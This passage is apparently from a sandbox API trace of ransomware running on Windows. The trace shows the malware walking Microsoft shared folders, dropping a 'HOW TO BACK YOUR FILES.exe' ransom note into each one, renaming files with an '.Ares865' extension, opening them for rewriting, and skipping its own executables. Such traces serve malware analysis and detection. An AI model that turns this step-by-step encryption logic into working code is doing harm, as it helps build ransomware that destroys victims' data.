(x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0150.588] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=55680) returned 1 [0150.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0150.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0150.588] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0150.615] lstrcpyW (in: lpString1=0x2cce486, lpString2="MSOINTL.REST.IDX_DLL" | out: lpString1="MSOINTL.REST.IDX_DLL") returned="MSOINTL.REST.IDX_DLL" [0150.615] lstrlenW (lpString="MSOINTL.REST.IDX_DLL") returned 20 [0150.615] lstrlenW (lpString="Ares865") returned 7 [0150.615] lstrcmpiW (lpString1="IDX_DLL", lpString2="Ares865") returned 1 [0150.616] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL.Ares865") returned 95 [0150.616] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll.ares865"), dwFlags=0x1) returned 1 [0150.618] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0150.618] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1388416) returned 1 [0150.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0150.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0150.619] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0150.789] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo" [0150.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1888 | out: hHeap=0x2b0000) returned 1 [0150.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79a8 | out: hHeap=0x2b0000) returned 1 [0150.789] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo") returned 59 [0150.789] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo" [0150.789] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0150.789] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msinfo\\how to back your files.exe"), bFailIfExists=1) returned 0 [0150.791] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0150.791] GetLastError () returned 0x0 [0150.791] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0150.791] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0150.791] CloseHandle (hObject=0x120) returned 1 [0150.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0150.792] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0150.792] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x53720e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53720e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0150.792] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0150.792] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0150.792] lstrcpyW (in: lpString1=0x2cce478, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0150.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0150.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x84) returned 0x2e95b0 [0150.792] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0150.792] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53720e00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x53720e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0150.792] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0150.792] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a868239, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a868239, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a868239, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4a000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="msinfo32.exe", cAlternateFileName="")) returned 1 [0150.792] lstrcmpiW (lpString1="msinfo32.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0150.792] lstrcmpiW (lpString1="msinfo32.exe", lpString2="aoldtz.exe") returned 1 [0150.793] lstrcpyW (in: lpString1=0x2cce478, lpString2="msinfo32.exe" | out: lpString1="msinfo32.exe") returned="msinfo32.exe" [0150.793] lstrlenW (lpString="msinfo32.exe") returned 12 [0150.793] lstrlenW (lpString="Ares865") returned 7 [0150.793] lstrcmpiW (lpString1="o32.exe", lpString2="Ares865") returned 1 [0150.793] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe.Ares865") returned 80 [0150.793] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msinfo\\msinfo32.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msinfo\\msinfo32.exe.ares865"), dwFlags=0x1) returned 1 [0150.795] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msinfo\\msinfo32.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0150.795] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=303104) returned 1 [0150.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0150.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0150.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0150.814] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US" [0150.814] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0150.814] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79a8 | out: hHeap=0x2b0000) returned 1 [0150.814] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US") returned 65 [0150.814] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US" [0150.814] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0150.814] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msinfo\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0150.815] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0150.815] GetLastError () returned 0x0 [0150.815] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0150.815] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0150.815] CloseHandle (hObject=0x120) returned 1 [0150.815] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0150.816] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0150.816] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x53746f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53746f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0150.816] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0150.816] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0150.816] lstrcpyW (in: lpString1=0x2cce484, lpString2="msinfo32.exe.mui" | out: lpString1="msinfo32.exe.mui") returned="msinfo32.exe.mui" [0150.816] lstrlenW (lpString="msinfo32.exe.mui") returned 16 [0150.816] lstrlenW (lpString="Ares865") returned 7 [0150.816] lstrcmpiW (lpString1="exe.mui", lpString2="Ares865") returned 1 [0150.816] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui.Ares865") returned 90 [0150.816] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui.ares865"), dwFlags=0x1) returned 1 [0150.818] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0150.818] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=26624) returned 1 [0150.818] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0150.818] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0150.818] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0150.822] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv" [0150.822] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1688 | out: hHeap=0x2b0000) returned 1 [0150.822] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7988 | out: hHeap=0x2b0000) returned 1 [0150.822] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv") returned 58 [0150.822] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv" [0150.822] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0150.823] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msenv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0150.823] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0150.824] GetLastError () returned 0x0 [0150.824] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0150.824] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0150.824] CloseHandle (hObject=0x120) returned 1 [0150.824] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0150.824] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0150.824] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x53746f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53746f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0150.824] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0150.824] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0150.824] lstrcpyW (in: lpString1=0x2cce476, lpString2="PublicAssemblies" | out: lpString1="PublicAssemblies") returned="PublicAssemblies" [0150.824] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7988 [0150.824] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x98) returned 0x31afc8 [0150.825] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7990 | out: ListHead=0x2e7710, ListEntry=0x2e7990) returned 0x2e7970 [0150.825] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x53746f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53746f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PublicAssemblies", cAlternateFileName="PUBLIC~1")) returned 0 [0150.825] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0150.825] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7990 [0150.825] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies" [0150.825] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0150.825] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7988 | out: hHeap=0x2b0000) returned 1 [0150.825] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies") returned 75 [0150.825] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies" [0150.825] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0150.825] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msenv\\publicassemblies\\how to back your files.exe"), bFailIfExists=1) returned 0 [0150.826] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0150.826] GetLastError () returned 0x0 [0150.826] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0150.826] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0150.826] CloseHandle (hObject=0x120) returned 1 [0150.826] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0150.826] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0150.826] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x53746f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53746f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0150.826] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0150.826] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0150.827] lstrcpyW (in: lpString1=0x2cce498, lpString2="extensibility.dll" | out: lpString1="extensibility.dll") returned="extensibility.dll" [0150.827] lstrlenW (lpString="extensibility.dll") returned 17 [0150.827] lstrlenW (lpString="Ares865") returned 7 [0150.827] lstrcmpiW (lpString1="ity.dll", lpString2="Ares865") returned 1 [0150.827] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\extensibility.dll.Ares865") returned 101 [0150.827] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\extensibility.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msenv\\publicassemblies\\extensibility.dll"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\extensibility.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msenv\\publicassemblies\\extensibility.dll.ares865"), dwFlags=0x1) returned 1 [0150.828] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\extensibility.dll.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msenv\\publicassemblies\\extensibility.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0150.829] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4608) returned 1 [0150.829] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0150.829] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0150.829] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0150.833] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink" [0150.833] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1808 | out: hHeap=0x2b0000) returned 1 [0150.833] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7968 | out: hHeap=0x2b0000) returned 1 [0150.833] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink") returned 56 [0150.833] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink" [0150.833] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0150.833] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\how to back your files.exe"), bFailIfExists=1) returned 0 [0150.834] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0150.835] GetLastError () returned 0x0 [0150.835] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0150.835] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0150.835] CloseHandle (hObject=0x120) returned 1 [0150.835] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0150.835] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0150.835] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, 